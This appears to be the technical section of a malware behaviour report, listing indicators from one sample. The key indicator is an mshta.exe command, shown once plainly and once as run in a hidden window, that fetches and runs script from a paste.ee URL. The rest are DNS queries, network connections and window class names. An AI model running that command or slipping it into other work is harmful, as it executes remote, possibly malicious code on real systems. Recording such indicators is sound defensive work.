Техническая информация
- '<SYSTEM32>\mshta.exe' https://paste.ee/p/fBhHV
- %TEMP%\1151630.cvr
- 'pa##e.ee':443
- 'fo###.gstatic.com':443
- 'oc##.thawte.com':80
- http://oc##.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D
- 'pa##e.ee':443
- 'fo###.gstatic.com':443
- DNS ASK pa##e.ee
- DNS ASK fo###.gstatic.com
- DNS ASK an####ics.paste.ee
- DNS ASK oc##.thawte.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '<SYSTEM32>\mshta.exe' https://paste.ee/p/fBhHV' (со скрытым окном)